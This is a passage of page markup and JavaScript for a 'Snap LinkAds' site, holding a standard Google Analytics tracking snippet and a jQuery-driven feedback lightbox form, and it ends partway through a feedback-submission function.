<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/index.php#" + currentTab);} else { urchinTracker();}</script></div><script type="text/javascript" src="/javascript/jquery.js"></script><img id="feedback_button" src="images/feedback.gif" alt="feedback" text="feedback" /><div class="lightbox"> <div class="lightbox-bg"> </div> <div class="lightbox-fg"> <form id="feedback" name="feedback"> <h3>Snap LinkAds Feedback</h3> Please type your question, suggestion or comment into the box below and click "Submit".<br/> <span id="feedback_error">Please enter your feedback and try again.<br/></span> <textarea name="feedback_text"></textarea> <input type="submit" name="submit" value="Submit" /> <input type="button" name="cancel" value="Cancel" /> </form> </div></div><script type="text/javascript">function show_feedback() { $('textarea[name=feedback_text]').html(''); $('.lightbox').css('display', 'block'); $("#feedback_error").css('display', 'none');}function hide_feedback() { $('.lightbox').css('display', 'none');}function submit_feedback(ev) { var feedbac..